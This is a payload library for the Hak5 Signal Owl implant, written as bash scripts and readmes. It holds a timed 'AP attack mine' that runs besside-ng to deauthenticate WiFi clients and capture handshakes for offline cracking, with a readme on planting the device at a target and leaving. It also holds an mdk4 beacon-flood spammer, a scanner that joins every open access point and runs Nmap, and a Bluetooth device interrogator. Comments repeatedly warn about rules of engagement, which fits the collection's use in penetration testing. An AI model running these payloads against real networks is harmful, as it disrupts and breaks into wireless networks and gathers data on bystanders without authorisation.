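├── payloads
    ├── library
    │   ├── wifi
    │   │   ├── WiFi-Connect
    │   │   │   └── payload.txt
    │   │   ├── Garbage-SSID-Spammer
    │   │   │   └── payload.txt
    │   │   ├── Delayed-AP-Attack-Mine
    │   │   │   ├── payload.txt
    │   │   │   └── readme.md
    │   │   └── Open-AP-Nmap-Scanner
    │   │       └── payload.txt
    │   ├── general
    │   │   └── arming-mode
    │   │       └── payload.txt
    │   └── bluetooth
    │       └── Bluetooth-Scanner
    │           ├── payload.txt
    │           └── README.md
    └── extensions
        └── wifi_connect.sh
└── README.md
/payloads/library/wifi/WiFi-Connect/payload.txt:
--------------------------------------------------------------------------------
#!/bin/bash
# Title: Simple WiFi Connection Example
# Author: Hak5Darren
# Version: 1.0
#
# Joins an existing WiFi network as a client via the WIFI_CONNECT helper
# from /payloads/extensions/wifi_connect.sh. The helper reads WIFI_SSID and
# WIFI_PASS; WIFI_INT optionally selects the interface (default wlan0).
#
# SECURITY NOTE: the passphrase sits here in clear text, and the helper
# copies it into /tmp/wpa-<iface>.conf on the device. Treat the payload
# file and the Owl itself as holding a network credential: use a dedicated
# engagement SSID/passphrase, keep the payload readable only by people who
# need it, and rotate the passphrase if the device is retired or lost.

# WiFi Client Setup
WIFI_SSID="network-name"
WIFI_PASS="passphrase"

LED SETUP
WIFI_CONNECT
# optionally start SSH server -- this exposes an interactive login on the
# network just joined; leave it commented out unless remote access is needed.
# /etc/init.d/sshd start
LED ATTACK
--------------------------------------------------------------------------------
/payloads/library/wifi/Garbage-SSID-Spammer/payload.txt:
--------------------------------------------------------------------------------
#!/bin/bash
# Title: Garbage SSID Spammer
# Description: Uses mdk4 to beacon non-printable SSIDs and SSIDs that break the 32-byte limit
# Author: Hak5Darren
# Props: ASPj and the aircrack-ng community
# Version: 1.0
#
# A beacon flood is visible to, and disruptive for, every WiFi client in
# range (malformed SSIDs can also crash some client stacks). Only run it
# where your rules of engagement explicitly allow it.
#
# mdk4 arguments (see mdk4 --help): "b" = beacon flood, "-a" advertise
# WPA/AES, "-m" use source MACs from the OUI database, "-s 500" packets per
# second.

LED SETUP
# airmon-ng normally creates wlan0mon; if it did not, stop here instead of
# handing mdk4 a missing interface and spinning with the LED stuck on SETUP.
airmon-ng start wlan0
if ! ip link show wlan0mon >/dev/null 2>&1; then
  echo "ERROR: monitor interface wlan0mon not found after airmon-ng start wlan0" >> /tmp/payload.log
  exit 1
fi
LED ATTACK
mdk4 wlan0mon b -a -m -s 500
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Payload Library for the Signal Owl by Hak5

![Signal Owl](https://cdn.shopify.com/s/files/1/0068/2142/files/signal-owl_400x.jpg "Signal Owl")

* [Purchase](https://shop.hak5.org/products/signal-owl "Purchase at Hak5.org")
* [Forums](https://forums.hak5.org/forum/98-signal-owl/ "Signal Owl Forums")
* 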
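  [Documentation](https://docs.hak5.org/hc/en-us/categories/360002117953-Signal-Owl "Signal Owl Documentation")
* [Downloads](https://downloads.hak5.org/ "Signal Owl Downloads")
--------------------------------------------------------------------------------
/payloads/extensions/wifi_connect.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Title: WIFI_CONNECT
# Description: Simplifies WiFi client mode connection. Expects $WIFI_SSID and $WIFI_PASS
# Author: Hak5Darren
#
# Optional inputs:
#   WIFI_INT      interface to use (default wlan0)
#   WIFI_TIMEOUT  seconds to wait for association before giving up; unset or
#                 0 keeps the original behaviour of waiting forever
# Returns 0 once udhcpc has been run on the interface, 1 if the association
# timeout expired (nothing is torn down in that case; wpa_supplicant keeps
# trying in the background).

function WIFI_CONNECT() {
  local conf waited=0
  [[ -z "$WIFI_INT" ]] && WIFI_INT=wlan0
  conf="/tmp/wpa-$WIFI_INT.conf"

  ifconfig "$WIFI_INT" up; sleep 10

  # The supplicant config carries the network passphrase in clear text. Remove
  # any stale copy and create the new one owner-only (umask 077 -> 0600) so it
  # is not world-readable in /tmp. printf instead of echo -e so an SSID or
  # passphrase containing backslashes is written literally.
  rm -f "$conf"
  ( umask 077; printf 'network={\nssid="%s"\npsk="%s"\npriority=1\n}\n' "$WIFI_SSID" "$WIFI_PASS" > "$conf" )

  wpa_supplicant -B -Dnl80211 -i "$WIFI_INT" -c "$conf"

  # Poll until the interface reports an association. With WIFI_TIMEOUT set,
  # give up after that many seconds instead of blocking the payload forever
  # on a network that is out of range or rejecting us.
  while iwconfig "$WIFI_INT" | grep -q Not-Associated; do
    if [[ "${WIFI_TIMEOUT:-0}" -gt 0 && "$waited" -ge "$WIFI_TIMEOUT" ]]; then
      echo "WIFI_CONNECT: no association with \"$WIFI_SSID\" on $WIFI_INT after ${WIFI_TIMEOUT}s" >> /tmp/payload.log
      return 1
    fi
    sleep 1
    waited=$((waited + 1))
  done
  udhcpc -i "$WIFI_INT"
}
export -f WIFI_CONNECT
--------------------------------------------------------------------------------
/payloads/library/general/arming-mode/payload.txt:
--------------------------------------------------------------------------------
#!/bin/bash
# Title: Arming Mode
# Author: Hak5
# Version: 1.0
#
# Enables the Owl's own WiFi radio and starts the SSH daemon so the device
# can be administered. This deliberately opens a remote login over the
# radio: arm the device only in a trusted environment, and make sure the
# root account has a strong, non-default password first.

# Refuse to run on any firmware other than the one this payload was written
# for. The message goes straight to the console because run() below
# discards stdout and stderr.
function check_version() {
  local version
  version=$(cat /etc/owl/VERSION 2>/dev/null)
  [[ "$version" = "1.0.0" ]] || {
    echo "ERROR: Requires firmware version 1.0.0." > /dev/console
    return 1
  }
}

# Enable the on-board radio (uci key wireless.radio0) and restart networking
# so the change takes effect.
function configure_network() {
  uci set wireless.radio0.disabled='0'
  uci commit wireless

  /etc/init.d/network restart
}

# Start the SSH daemon; this is what makes the armed device reachable.
function start_ssh() {
  /etc/init.d/sshd start
}

# Record the mode for other tooling, bring the radio up, start SSH, then
# signal readiness on the LED (red, double-blink pattern).
function run() {
  check_version && {
    echo "ARMING" > /tmp/MODE

    configure_network
    start_ssh

    LED R DOUBLE
  }
}

# All output is discarded; check_version reports directly to the console.
run &> /dev/null
--------------------------------------------------------------------------------
/payloads/library/wifi/Delayed-AP-Attack-Mine/payload.txt:
--------------------------------------------------------------------------------
#!/bin/bash
# Title: Timed-AP-Attack
# Description: Starts an aggressive AP attack after n seconds, stops after n seconds, and then shuts down
# Author: Saint Crossbow
# Version: 1.0

# Careful since not nicest thing to do and aggressive.
# Check your RoE and ensure you do not get collateral damage: besside-ng
# obtains handshakes by deauthenticating connected clients, so users of every
# network it touches are knocked offline. With TARGET_BSSID left empty it
# goes after EVERY AP in range, including ones that are not in scope.
# Useful besside-ng options (extra ones go in BESSIDE_OPTS below):
# -b Attack a specific BSSID
# -W Attack only WPA
# -c Lock on specific channel
# Once complete, the capture files are in the /root/loot directory. Extract using:
# aircrack-ng -J filebase capturefile.cap
# After that crack the hash using john or hashcat

LED SETUP
# Short fuse: starting in 5 minutes
START_IN=300
# Gather for 2 minutes
GATHER_FOR=120
# Leave blank if you want to attack all APs
TARGET_BSSID=""
# Extra besside-ng options, e.g. "-W" or "-c 6"; leave blank for none
BESSIDE_OPTS=""
# Interface besside-ng attacks on (the readme expects an external adapter)
ATTACK_INT=wlan0
# Where captures and the besside log end up
LOOT_DIR=/root/loot

echo "|_ Starting in $START_IN seconds, gathering for $GATHER_FOR seconds"
if [ -z "$TARGET_BSSID" ]; then
  echo "|_ Attack all in range"
else
  echo "|_ Attack only $TARGET_BSSID"
fi

sleep "$START_IN"

LED ATTACK

echo "[*] Starting attack"

# Build the argument list once so both branches run the same command line.
# shellcheck disable=SC2206 -- BESSIDE_OPTS is intentionally word-split
args=($BESSIDE_OPTS)
if [ -z "$TARGET_BSSID" ]; then
  echo "[*] Attacking all APs in range..."
else
  echo "[*] Attacking only $TARGET_BSSID..."
  args+=(-b "$TARGET_BSSID")
fi
besside-ng "${args[@]}" "$ATTACK_INT" &
bpid=$!

sleep "$GATHER_FOR"

echo "[*] Stopping attack"
kill "$bpid"
wait "$bpid"

# Collect the loot. The directory may not exist on a fresh device; without it
# the first mv would rename besside.log to /root/loot and the second would fail.
mkdir -p "$LOOT_DIR"
mv /besside.log "$LOOT_DIR"
mv /*.cap "$LOOT_DIR"
sync

LED SUCCESS

echo "[*] Shutting down"
poweroff
--------------------------------------------------------------------------------
/payloads/library/wifi/Delayed-AP-Attack-Mine/readme.md:
--------------------------------------------------------------------------------
# Delayed AP Attack Mine
### Set your fuse, make a quick getaway, and let your Signal Owl crack WiFi while everyone else is gone
---
Turn your Signal Owl into a powerful implant by using Besside-ng to attack networks. Besside-ng is an amazing application that aggressively attacks WiFi networks and obtains a hash for cracking offline. In the unlikely event WEP is found, it is cracked immediately. Your Signal Owl already has it installed - but this particular payload delays the attack so you don't have to be present when it runs (or even better when no one is at the target area at all).

An external WiFi adapter is required for this payload. The Hak5 RT5370 was tested and works perfectly.

**WARNING: This program is very aggressive: ensure you are on sound legal ground and only run it if your rules of engagement allow such attacks. Research your target beforehand to ensure you do not have collateral damage. Besside-ng deauthenticates clients to capture handshakes, so with no BSSID set every network in range - in scope or not - will have its users disconnected.**

*Setup*
1. Boot into ARMING mode
2. Copy the payload to /root/payload.txt
3. Enable to run by:
`chmod +x payload.txt`
4. Open the payload with nano
5. Change the START_IN value to be the length of your "delay fuse" in seconds - this is your time to make your exit, stage left
6. Change the GATHER_FOR value to be the length you want besside-ng to run. Consider your target's level of attention accordingly
7. Set the BSSID if you want to only attack a specific network; BESSIDE_OPTS takes any extra besside-ng options such as `-W` (WPA only) or `-c <channel>`
8. 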
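   Save, exit, and shutdown.

The mine is ready for implant.

*Deploy*
1. Connect the WiFi adapter
2. Place the Signal Owl at your target. Once booted and on it will stay steady red until the payload runs
3. Set your watch and leave
4. After the timer is up, besside-ng will run for the specified time, during which the LED will flash in the ATTACK pattern.
5. After the run, the Signal Owl will power off (the LED will of course be off as well).

*Gather Loot*
1. All loot is found in the /root/loot directory
2. To extract hashes, use:
`aircrack-ng -J filebase capturefile.cap`
(`-J` writes the older hccap format; recent hashcat releases expect the 22000 format instead, so check which one your cracker accepts.)
3. Use your favorite password cracker to obtain the passphrase - YMMV based on passphrase difficulty. May I recommend byepass for ease of use?

--------------------------------------------------------------------------------
/payloads/library/bluetooth/Bluetooth-Scanner/payload.txt:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Title: Bluetooth Scanner
# Author: Brian Fair , https://github.com/b1fair
# Version: 1.0
#
# Description: Scans for bluetooth devices, optionally interrogates them (hcitool info), tested with Hak5 "Mini USB Bluetooth Adapter (Qualcomm CSR8510 chipset)"
#
# LED SETUP: Scanning
# LED ATTACK: Querying devices
#
# Operator notes:
#  - "hcitool scan" runs an inquiry; "hcitool info" goes further and opens a
#    connection to each discovered device to read its name and features, so
#    with INTERROGATE=1 the Owl is actively talking to other people's devices
#    and may be noticed. Set INTERROGATE=0 if the engagement only allows
#    discovery.
#  - The loot files contain device addresses and names, i.e. data that can
#    identify individuals; store and dispose of them per your rules of
#    engagement.
#

LOOT_DIR=/root/loot/bluetooth_scan
STAMP=$(date +%s)              # Taken once so the .list and .info files share the same timestamp
BT_OUTFILE=$STAMP.bt.list      # File (in LOOT_DIR) to write list of observed MACs to
BT_INFOFILE=$STAMP.bt.info     # File (in LOOT_DIR) to write results of "hcitool info " to (if enabled)
BTDEV=hci0                     # Set to the device to use for scanning (probably hci0)
DEBUG=0                        # Set to 1 to enable verbose logging.
INTERROGATE=1                  # Set to 1 to enable running "hcitool info " on observed bluetooth MACs, 0 to disable this.

# Echo a debug line to the console and /tmp/payload.log when DEBUG=1.
# Always returns 0 so callers' exit status is not affected.
function log_debug() {
  [[ $DEBUG == 1 ]] && echo "$@" | tee -a /tmp/payload.log
  return 0
}

# Run one inquiry on $BTDEV, store the raw "<mac>\t<name>" lines in
# /tmp/bluetooth_scan and append any MAC not yet in the loot list, prefixed
# with a timestamp. Sets total_bts to the number of devices seen.
function scan_bluetooth() {
  local check_bt_mac
  LED SETUP
  log_debug "... Scanning for bluetooth devices..."
  # -i: the original only used BTDEV to bring the adapter up; scans went to
  # whatever hcitool picked as its default device.
  hcitool -i "$BTDEV" scan | grep -v "^Scanning" > /tmp/bluetooth_scan
  total_bts=$(wc -l < /tmp/bluetooth_scan)
  log_debug "... Found $total_bts bluetooth devices"
  while read -r check_bt_mac _; do
    [[ -z "$check_bt_mac" ]] && continue
    # -F: the address is a literal string, not a regular expression
    if grep -i -q -F -- "$check_bt_mac" "$LOOT_DIR/$BT_OUTFILE"; then
      log_debug "--- $check_bt_mac: Already seen, not logging."
    else
      log_debug "+++ $check_bt_mac: New MAC, logging..."
      printf '%s\t%s\n' "$(date)" "$(grep -i -F -- "$check_bt_mac" /tmp/bluetooth_scan)" >> "$LOOT_DIR/$BT_OUTFILE"
    fi
  done < /tmp/bluetooth_scan
}

# Interrogate entry number $on of the last scan, unless that MAC has already
# been queried this run.
function interrogate_bluetooth() {
  local line
  LED ATTACK
  line=$(sed -n "${on}p" /tmp/bluetooth_scan)
  read -r current_bt_mac current_bt <<< "$line"
  [[ -z "$current_bt_mac" ]] && return 0
  if grep -i -q -F -- "$current_bt_mac" /tmp/bt_scanned; then
    log_debug "--- $current_bt_mac: Already interrogated, skipping."
  else
    bluetooth_info
  fi
}

# Connect to $current_bt_mac with "hcitool info" and append the output to the
# .info loot file; remember the MAC so it is not queried again this run.
function bluetooth_info() {
  log_debug "+++ $current_bt_mac ($current_bt): Not yet scanned, scanning..."
  echo "Begin $current_bt_mac ----------------------" >> "$LOOT_DIR/$BT_INFOFILE"
  hcitool -i "$BTDEV" info "$current_bt_mac" >> "$LOOT_DIR/$BT_INFOFILE"
  echo "$current_bt_mac" >> /tmp/bt_scanned
}

# Main loop: scan, optionally interrogate each device, pause, repeat forever.
function run() {
  runonce
  while true; do
    setup
    scan_bluetooth
    if [ "$INTERROGATE" -eq 1 ]; then
      for ((on = 1; on <= total_bts; on++)); do
        interrogate_bluetooth
      done
    else
      log_debug "... Interrogate mode is not enabled, skipping scans."
    fi
    sleep 5
    log_debug "... Completed recon. Restarting..."
  done
}

# One-time initialisation: bring the adapter up, reset the scratch files and
# create the loot files with a "Startup" marker as a time reference.
function runonce() {
  hciconfig "$BTDEV" up
  log_debug "-----------------------------------------"
  log_debug "Our local bluetooth device info:"
  [[ $DEBUG == 1 ]] && hciconfig | tee -a /tmp/payload.log
  log_debug "-----------------------------------------"
  > /tmp/bluetooth_scan
  > /tmp/bt_scanned
  mkdir -p "$LOOT_DIR"
  touch "$LOOT_DIR/$BT_OUTFILE" "$LOOT_DIR/$BT_INFOFILE"
  printf '%s\tStartup\n' "$(date)" >> "$LOOT_DIR/$BT_OUTFILE"
}

# Per-iteration reset of the device index used by the interrogation loop.
function setup() {
  on=0
}

# Run payload

run

--------------------------------------------------------------------------------
/payloads/library/wifi/Open-AP-Nmap-Scanner/payload.txt:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Title: Open AP Nmap Scanner
# Author: Hak5Darren
# Version: 1.0
#
# Description: Scans for open access points, then connects to each and runs an Nmap scan saving logs to the loot folder
#
# LED SETUP:  Scanning for open access points
# LED STAGE1: Connecting to an open access point
# LED STAGE2: Connected, running nmap scan
#
# See nmap --help for options. Default "-sP" ping scans the address space for fast host discovery
# (-sP is the older spelling of -sn in current nmap releases).
#
# Joining and scanning a network you are not authorised to use is unlawful in
# most places: this payload connects to EVERY open AP it can see, so only run
# it where all of them are in scope.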
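
NMAP_OPTIONS="-sP"
LOOT_DIR=/root/loot/open_ap_nmap_scan
MAX_CIDR=20         # Only scan networks whose prefix is /20 or longer (i.e. at most ~4k addresses)
DEBUG=1
ASSOC_TIMEOUT=30    # Seconds to wait for association, and again for an address, before giving up on an AP

# SSIDs are untrusted input (anyone nearby can broadcast one) and are used
# below as grep patterns; they are matched as fixed strings for that reason.

# Scan with wlan0 and write the names of APs advertising no encryption to
# /tmp/open, one per line, sorted and de-duplicated; hidden/blank names are
# dropped because they cannot be joined by name. Sets total_aps.
function scan_wifi() {
  [[ $DEBUG == 1 ]] && echo Scanning for open access points | tee -a /tmp/payload.log
  iwlist wlan0 scan > /tmp/wifi_scan
  # The ESSID line follows the "Encryption key" line in iwlist output; pull the
  # quoted name out with sed rather than relying on a fixed column offset.
  grep "Encryption key:off" -A1 /tmp/wifi_scan \
    | sed -n 's/^.*ESSID:"\(.*\)"$/\1/p' \
    | grep -v '^$' \
    | sort -u > /tmp/open
  total_aps=$(wc -l < /tmp/open)
  [[ $DEBUG == 1 ]] && echo Found "$total_aps" open access points | tee -a /tmp/payload.log
}

# Look up the BSSID of open AP number $on and, unless it was already scanned
# this boot, connect to it and run the nmap scan. An AP that could not be
# joined is not recorded, so it is retried on the next pass.
function check_ap() {
  current_ap=$(sed -n "${on}p" /tmp/open)
  [[ $DEBUG == 1 ]] && echo "-------------------------------" | tee -a /tmp/payload.log
  # -F: match the SSID literally; the "Cell NN - Address: <mac>" line sits
  # within the five lines before the ESSID line.
  current_ap_mac=$(grep -F -B5 -- "ESSID:\"$current_ap\"" /tmp/wifi_scan | grep Address | awk '{print $5}' | head -n 1)
  [[ $DEBUG == 1 ]] && echo Selected AP MAC: "$current_ap_mac" | tee -a /tmp/payload.log
  if grep -i -q -F -- "$current_ap_mac" /tmp/nmap_scanned; then
    [[ $DEBUG == 1 ]] && echo Skipping - Already scanned AP: "$current_ap" with MAC: "$current_ap_mac" | tee -a /tmp/payload.log
  elif connect_wifi; then
    scan_network
  else
    [[ $DEBUG == 1 ]] && echo "Could not join $current_ap - will retry on the next pass" | tee -a /tmp/payload.log
  fi
}

# Associate wlan0 with $current_ap (open network, no key) and obtain an
# address with udhcpc. Sets SUBNET and APMAC. Returns 1 if association or
# an address does not arrive within ASSOC_TIMEOUT seconds, so one
# unreachable AP cannot hang the whole loop; returns 0 otherwise.
function connect_wifi() {
  local waited=0
  LED STAGE1
  [[ $DEBUG == 1 ]] && echo Connecting to Open WiFi AP: "$current_ap" | tee -a /tmp/payload.log
  ifconfig wlan0 down
  iwconfig wlan0 mode Managed essid "$current_ap"
  ifconfig wlan0 up
  while iwconfig wlan0 | grep -q Not-Associated; do
    if [ "$waited" -ge "$ASSOC_TIMEOUT" ]; then
      [[ $DEBUG == 1 ]] && echo "No association with $current_ap after ${ASSOC_TIMEOUT}s" | tee -a /tmp/payload.log
      return 1
    fi
    sleep 1
    waited=$((waited + 1))
  done
  [[ $DEBUG == 1 ]] && echo "Connected to AP number $on with SSID $current_ap" | tee -a /tmp/payload.log
  udhcpc -i wlan0
  # Clear the subnet left over from the previous AP, otherwise the wait below
  # is skipped and scan_network may run against a stale address.
  SUBNET=""
  waited=0
  while [ -z "$SUBNET" ]; do
    if [ "$waited" -ge "$ASSOC_TIMEOUT" ]; then
      [[ $DEBUG == 1 ]] && echo "No address on $current_ap after ${ASSOC_TIMEOUT}s" | tee -a /tmp/payload.log
      return 1
    fi
    sleep 1 && find_subnet
    waited=$((waited + 1))
  done
  APMAC=$(iw wlan0 link | grep Connected | awk '{print $3}')
  [[ $DEBUG == 1 ]] && echo "AP MAC Address/BSSID: $APMAC" | tee -a /tmp/payload.log
  [[ $DEBUG == 1 ]] && iwconfig wlan0 | grep ESSID | tee -a /tmp/payload.log
  [[ $DEBUG == 1 ]] && ifconfig wlan0 | grep inet | tee -a /tmp/payload.log
  # Explicit success: the debug lines above return 1 when DEBUG is off.
  return 0
}
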
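# Work out the network wlan0 was given and run nmap over it, unless its
# prefix is shorter than /MAX_CIDR (too many hosts). The report is written
# to LOOT_DIR under a name built from the SSID and BSSID, and the BSSID is
# recorded in /tmp/nmap_scanned so the AP is not scanned again this boot.
function scan_network() {
  local safe_ap
  LED STAGE2
  find_subnet
  [[ $DEBUG == 1 ]] && echo "Found Subnet: $SUBNET" | tee -a /tmp/payload.log
  CIDR=$(echo "$SUBNET" | cut -d '/' -f 2)
  [[ $DEBUG == 1 ]] && echo "CIDR: $CIDR" | tee -a /tmp/payload.log
  # The SSID is chosen by whoever runs the AP. A "/" or ".." in it would let
  # the nmap report land outside LOOT_DIR, so reduce it to a safe character
  # set before using it as a file name.
  safe_ap=$(printf '%s' "$current_ap" | tr -c 'A-Za-z0-9._-' '_')
  [[ -z "$safe_ap" ]] && safe_ap="unnamed"
  # -n guard: an empty CIDR would make the numeric test itself error out.
  if [ -n "$CIDR" ] && [ "$CIDR" -ge "$MAX_CIDR" ]; then
    [[ $DEBUG == 1 ]] && echo "Starting network scan" | tee -a /tmp/payload.log
    # NMAP_OPTIONS is deliberately unquoted so it can hold several options.
    nmap $NMAP_OPTIONS "$SUBNET" -oN "$LOOT_DIR/$safe_ap-$APMAC.txt" &>/dev/null
  else
    [[ $DEBUG == 1 ]] && echo "Network too large - skipping scan" | tee -a /tmp/payload.log
  fi
  echo "$APMAC" >> /tmp/nmap_scanned
}

# Read wlan0's IPv4 address/prefix from "ip addr" and set SUBNET to the
# network with the last octet zeroed (e.g. 192.168.1.0/24). SUBNET stays
# empty while the interface has no address.
function find_subnet() {
  SUBNET=$(ip addr | grep -i wlan0 | grep -i inet \
    | grep -E -o "([0-9]{1,3}[.]){3}[0-9]{1,3}/[0-9]{1,2}" \
    | sed 's/\.[0-9]*\//\.0\//')
  [[ $DEBUG == 1 ]] && echo "Found subnet for network $current_ap as $SUBNET" | tee -a /tmp/payload.log
}

# Main loop: find open APs, handle each one in turn, pause, repeat forever.
function run() {
  while true; do
    setup
    scan_wifi
    for ((on = 1; on <= total_aps; on++)); do
      check_ap
    done
    sleep 5
    [[ $DEBUG == 1 ]] && echo Completed recon. Restarting... | tee -a /tmp/payload.log
  done
}

# Per-pass setup. Any running wpa_supplicant is killed because it would
# otherwise keep reconfiguring wlan0 underneath iwconfig; note this also
# tears down a client connection another payload (e.g. WIFI_CONNECT) set up.
function setup() {
  LED SETUP
  mkdir -p "$LOOT_DIR"
  touch /tmp/nmap_scanned
  on=0
  killall wpa_supplicant
}

# Run payload

run


--------------------------------------------------------------------------------
/payloads/library/bluetooth/Bluetooth-Scanner/README.md:
--------------------------------------------------------------------------------
# A basic bluetooth scanner

Scans for bluetooth devices, and optionally interrogates them (using hcitool info). Note that `hcitool info` opens a connection to each device it queries, so interrogation is active rather than passive.

## 1. Hardware

Tested with Hak5's "Mini USB Bluetooth Adapter" (Uses the Qualcomm CSR8510 chipset).

## 2. Configuration Variables

Where to write our output (loot):
```
LOOT_DIR=/root/loot/bluetooth_scan
```
Where scan results should go (using unix timestamp for uniqueness):
```
BT_OUTFILE=`date +%s`.bt.list
```
Where interrogation results should go (using unix timestamp for uniqueness):
```
BT_INFOFILE=`date +%s`.bt.info
```
Your bluetooth device, probably hci0:
```
BTDEV=hci0
```
Setting DEBUG to 1 will result in a lot more output to console and to /tmp/payload.log (does not survive reboot)
```
DEBUG=0
```
Setting INTERROGATE to 1 enables running hcitool info on all discovered devices, and logging to BT_INFOFILE, on by default.
```
INTERROGATE=1
```

## 3. Sample output

### a. The loot directory

...should look like this:
```
root@Owl:~/loot/bluetooth_scan# ls -al
drwxr-xr-x 2 root root 0 Aug 7 10:21 .
drwxr-xr-x 3 root root 0 Aug 7 08:48 ..
-rw-r--r-- 1 root root 0 Aug 7 10:21 1565173272.bt.info
-rw-r--r-- 1 root root 153 Aug 7 10:24 1565173272.bt.list
```
### b. Basic scan details

Bluetooth MACs are logged when first seen, with a timestamp. The timestamps are whatever the Owl's clock says, which may not be set correctly, but the 'Startup' entry gives a frame of reference relative to when the payload began. These files record device addresses and names, which can identify individuals, so treat them as sensitive loot.
```
root@Owl:~/loot/bluetooth_scan# cat 1565172658.bt.list
Wed Aug 7 10:10:59 UTC 2019 Startup
Wed Aug 7 10:18:25 UTC 2019 F8:38:80:B0:AA:AA iPhone
Wed Aug 7 10:19:10 UTC 2019 30:21:19:C5:AA:BB SCR1986BT-AS
```

### c. Interrogation results

If INTERROGATE=1, you'll get the results of hcitool info here (the angle-bracketed feature names are partly lost in this rendering).

```
root@Owl:~/loot/bluetooth_scan# cat 1565172658.bt.info
Begin F8:38:80:B0:AA:AA ----------------------
Requesting information ...
BD Address: F8:38:80:B0:AA:AA
Device Name: iPhone
LMP Version: 5.0 (0x9) LMP Subversion: 0x4307
Manufacturer: Broadcom Corporation (15)
Features page 0: 0xbf 0xfe 0xcf 0xfe 0xdb 0xff 0x7b 0x87
<3-slot packets> <5-slot packets>
<3-slot EDR ACL>
<5-slot EDR ACL>
<3-slot EDR eSCO>
Features page 1: 0x0f 0x00 0x00 0x00 0x00 0x00 0x00 0x00
Features page 2: 0x7f 0x0f 0x00 0x00 0x00 0x00 0x00 0x00
Begin 30:21:19:C5:BB:BB ----------------------
Requesting information ...
BD Address: 30:21:19:C5:BB:BB
Device Name: SCR1986BT-AS
LMP Version: 3.0 (0x5) LMP Subversion: 0x1f4
Manufacturer: CONWISE Technology Corporation Ltd (66)
Features page 0: 0xbf 0x3a 0x85 0xfa 0x98 0x1d 0x59 0x87
<3-slot packets> <5-slot packets>
<3-slot EDR ACL> <5-slot EDR ACL>
Features page 1: 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0x00
```
--------------------------------------------------------------------------------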